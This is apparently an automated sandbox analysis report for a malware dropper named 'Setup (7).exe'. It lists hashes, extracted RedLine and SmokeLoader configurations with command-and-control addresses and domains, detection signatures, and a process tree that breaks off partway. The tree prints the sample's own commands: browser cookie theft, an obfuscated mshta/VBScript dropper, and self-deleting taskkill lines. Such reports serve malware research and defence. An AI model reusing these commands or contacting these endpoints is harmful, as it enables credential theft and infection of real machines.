Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    384s
  • max time network
    1812s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-08-2021 20:54

General

  • Target

    Setup (7).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

supertraff

C2

135.148.139.222:1494

Extracted

Family

redline

Botnet

24.08

C2

95.181.172.100:55640

Extracted

Family

redline

Botnet

dibild2

C2

135.148.139.222:1494

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • Blocklisted process makes network request 7 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 42 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 10 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 23 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 46 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 49 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 8 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 19 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 33 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 48 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
    1⤵
      PID:2588
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2804
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2788
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:2712
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Drops file in System32 directory
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:5560
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2536
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1872
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1396
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1264
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1196
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1076
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    PID:408
                    • C:\ProgramData\prepm\jtdxtws.exe
                      C:\ProgramData\prepm\jtdxtws.exe start
                      2⤵
                        PID:2052
                      • C:\Users\Admin\AppData\Roaming\rvbbrew
                        C:\Users\Admin\AppData\Roaming\rvbbrew
                        2⤵
                          PID:3504
                        • C:\Users\Admin\AppData\Roaming\vabbrew
                          C:\Users\Admin\AppData\Roaming\vabbrew
                          2⤵
                            PID:9532
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:68
                          • C:\Users\Admin\AppData\Local\Temp\Setup (7).exe
                            "C:\Users\Admin\AppData\Local\Temp\Setup (7).exe"
                            1⤵
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:672
                            • C:\Users\Admin\Documents\y0Ky67NxkdR6ZlSXSMkI_fGB.exe
                              "C:\Users\Admin\Documents\y0Ky67NxkdR6ZlSXSMkI_fGB.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:3048
                              • C:\Users\Admin\Documents\y0Ky67NxkdR6ZlSXSMkI_fGB.exe
                                "C:\Users\Admin\Documents\y0Ky67NxkdR6ZlSXSMkI_fGB.exe"
                                3⤵
                                • Executes dropped EXE
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: MapViewOfSection
                                PID:752
                            • C:\Users\Admin\Documents\updDcXLAwMEXL_fD14Ja00ac.exe
                              "C:\Users\Admin\Documents\updDcXLAwMEXL_fD14Ja00ac.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:2272
                            • C:\Users\Admin\Documents\9Sk11_7DwI0bfSwLTfD1X9f5.exe
                              "C:\Users\Admin\Documents\9Sk11_7DwI0bfSwLTfD1X9f5.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:3936
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 388
                                3⤵
                                • Program crash
                                PID:692
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 368
                                3⤵
                                • Program crash
                                PID:4276
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 404
                                3⤵
                                • Program crash
                                PID:1028
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 596
                                3⤵
                                • Program crash
                                PID:4060
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 660
                                3⤵
                                • Program crash
                                PID:5336
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 696
                                3⤵
                                • Program crash
                                PID:5716
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 664
                                3⤵
                                • Program crash
                                PID:3712
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 708
                                3⤵
                                • Program crash
                                PID:5664
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 684
                                3⤵
                                • Suspicious use of SetThreadContext
                                • Program crash
                                PID:4704
                              • C:\Users\Admin\Documents\9Sk11_7DwI0bfSwLTfD1X9f5.exe
                                "C:\Users\Admin\Documents\9Sk11_7DwI0bfSwLTfD1X9f5.exe"
                                3⤵
                                  PID:5688
                              • C:\Users\Admin\Documents\ZklLBHjQnCxfRwrA9PpUPK8s.exe
                                "C:\Users\Admin\Documents\ZklLBHjQnCxfRwrA9PpUPK8s.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:2652
                                • C:\Users\Admin\Documents\ZklLBHjQnCxfRwrA9PpUPK8s.exe
                                  C:\Users\Admin\Documents\ZklLBHjQnCxfRwrA9PpUPK8s.exe
                                  3⤵
                                  • Executes dropped EXE
                                  PID:4548
                                • C:\Users\Admin\Documents\ZklLBHjQnCxfRwrA9PpUPK8s.exe
                                  C:\Users\Admin\Documents\ZklLBHjQnCxfRwrA9PpUPK8s.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4644
                              • C:\Users\Admin\Documents\HD7hEzUFTGoPMTOSnCAFstEe.exe
                                "C:\Users\Admin\Documents\HD7hEzUFTGoPMTOSnCAFstEe.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:1856
                              • C:\Users\Admin\Documents\9BgwOXLL3qGfq4s3A0lqsMQL.exe
                                "C:\Users\Admin\Documents\9BgwOXLL3qGfq4s3A0lqsMQL.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3788
                                • C:\Users\Admin\AppData\Roaming\2684552.exe
                                  "C:\Users\Admin\AppData\Roaming\2684552.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4164
                                • C:\Users\Admin\AppData\Roaming\5119445.exe
                                  "C:\Users\Admin\AppData\Roaming\5119445.exe"
                                  3⤵
                                    PID:3512
                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      PID:5528
                                  • C:\Users\Admin\AppData\Roaming\2833910.exe
                                    "C:\Users\Admin\AppData\Roaming\2833910.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4996
                                  • C:\Users\Admin\AppData\Roaming\4090041.exe
                                    "C:\Users\Admin\AppData\Roaming\4090041.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:804
                                • C:\Users\Admin\Documents\naKqpGhuZ6cD2UVnyMwZMOCq.exe
                                  "C:\Users\Admin\Documents\naKqpGhuZ6cD2UVnyMwZMOCq.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1728
                                • C:\Users\Admin\Documents\KehpUt59b2leAFuafbV_tsDW.exe
                                  "C:\Users\Admin\Documents\KehpUt59b2leAFuafbV_tsDW.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2180
                                • C:\Users\Admin\Documents\rGfnvaxel4zJc7mLiN2cvL_s.exe
                                  "C:\Users\Admin\Documents\rGfnvaxel4zJc7mLiN2cvL_s.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:3704
                                  • C:\Users\Admin\Documents\rGfnvaxel4zJc7mLiN2cvL_s.exe
                                    C:\Users\Admin\Documents\rGfnvaxel4zJc7mLiN2cvL_s.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4604
                                • C:\Users\Admin\Documents\y1Clku_APnpazeeNIGCU4WsE.exe
                                  "C:\Users\Admin\Documents\y1Clku_APnpazeeNIGCU4WsE.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:512
                                • C:\Users\Admin\Documents\fItJjrL4d_IupE0hQNqH609f.exe
                                  "C:\Users\Admin\Documents\fItJjrL4d_IupE0hQNqH609f.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1296
                                • C:\Users\Admin\Documents\BpiO8Uu0I46msVBVqX32Hs7G.exe
                                  "C:\Users\Admin\Documents\BpiO8Uu0I46msVBVqX32Hs7G.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3356
                                • C:\Users\Admin\Documents\6JFiCoYVCAKjJpeXWi5ZJsfn.exe
                                  "C:\Users\Admin\Documents\6JFiCoYVCAKjJpeXWi5ZJsfn.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2064
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\8990058774.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    PID:3512
                                    • C:\Users\Admin\AppData\Local\Temp\8990058774.exe
                                      "C:\Users\Admin\AppData\Local\Temp\8990058774.exe"
                                      4⤵
                                      • Drops file in Windows directory
                                      PID:6600
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\2852146098.exe"
                                    3⤵
                                      PID:7344
                                      • C:\Users\Admin\AppData\Local\Temp\2852146098.exe
                                        "C:\Users\Admin\AppData\Local\Temp\2852146098.exe"
                                        4⤵
                                          PID:8120
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 8120 -s 748
                                            5⤵
                                            • Program crash
                                            PID:5916
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 8120 -s 728
                                            5⤵
                                            • Program crash
                                            PID:5436
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 8120 -s 728
                                            5⤵
                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                            • Program crash
                                            PID:2216
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "6JFiCoYVCAKjJpeXWi5ZJsfn.exe" /f & erase "C:\Users\Admin\Documents\6JFiCoYVCAKjJpeXWi5ZJsfn.exe" & exit
                                        3⤵
                                          PID:6240
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /im "6JFiCoYVCAKjJpeXWi5ZJsfn.exe" /f
                                            4⤵
                                            • Kills process with taskkill
                                            PID:4428
                                      • C:\Users\Admin\Documents\wYdLLLiMcUoVGUmVMj6oBMLt.exe
                                        "C:\Users\Admin\Documents\wYdLLLiMcUoVGUmVMj6oBMLt.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:2324
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 760
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2284
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 784
                                          3⤵
                                          • Program crash
                                          PID:5328
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 772
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5624
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 824
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5756
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 956
                                          3⤵
                                          • Program crash
                                          PID:6000
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 984
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5776
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1000
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3712
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1428
                                          3⤵
                                          • Program crash
                                          PID:6784
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1540
                                          3⤵
                                          • Program crash
                                          PID:6964
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1492
                                          3⤵
                                          • Program crash
                                          PID:7072
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1672
                                          3⤵
                                          • Program crash
                                          PID:6424
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1392
                                          3⤵
                                          • Program crash
                                          PID:6520
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1496
                                          3⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Program crash
                                          PID:6768
                                      • C:\Users\Admin\Documents\VxH5IopDA7Jx6TMLtpWfHXcL.exe
                                        "C:\Users\Admin\Documents\VxH5IopDA7Jx6TMLtpWfHXcL.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1256
                                      • C:\Users\Admin\Documents\iiZoOUs1MAOeXVrzKX8MpR8z.exe
                                        "C:\Users\Admin\Documents\iiZoOUs1MAOeXVrzKX8MpR8z.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Drops file in Program Files directory
                                        PID:2188
                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                          "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Drops startup file
                                          PID:4864
                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            4⤵
                                            • Executes dropped EXE
                                            PID:5944
                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                            4⤵
                                            • Executes dropped EXE
                                            PID:5556
                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            4⤵
                                              PID:6252
                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                              4⤵
                                              • Executes dropped EXE
                                              PID:6332
                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              4⤵
                                                PID:6840
                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                4⤵
                                                  PID:6896
                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  4⤵
                                                    PID:6224
                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                    4⤵
                                                      PID:6268
                                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Checks whether UAC is enabled
                                                    • Drops file in Program Files directory
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2000
                                                  • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    PID:180
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:1096
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:5884
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      4⤵
                                                        PID:10052
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        4⤵
                                                          PID:5348
                                                    • C:\Users\Admin\Documents\L2PRFvz05DIkW70z0zwzxq7A.exe
                                                      "C:\Users\Admin\Documents\L2PRFvz05DIkW70z0zwzxq7A.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:344
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 660
                                                        3⤵
                                                        • Program crash
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5104
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 648
                                                        3⤵
                                                        • Program crash
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:908
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 712
                                                        3⤵
                                                        • Program crash
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2988
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 700
                                                        3⤵
                                                        • Program crash
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4748
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 1076
                                                        3⤵
                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                        • Program crash
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:904
                                                    • C:\Users\Admin\Documents\drRX5aJPDKLqAEncATsyNLcD.exe
                                                      "C:\Users\Admin\Documents\drRX5aJPDKLqAEncATsyNLcD.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:2216
                                                      • C:\Windows\SysWOW64\mshta.exe
                                                        "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\drRX5aJPDKLqAEncATsyNLcD.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\drRX5aJPDKLqAEncATsyNLcD.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                        3⤵
                                                          PID:1088
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\drRX5aJPDKLqAEncATsyNLcD.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\drRX5aJPDKLqAEncATsyNLcD.exe" ) do taskkill -IM "%~nXW" -f
                                                            4⤵
                                                              PID:156
                                                              • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                                WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:5376
                                                                • C:\Windows\SysWOW64\mshta.exe
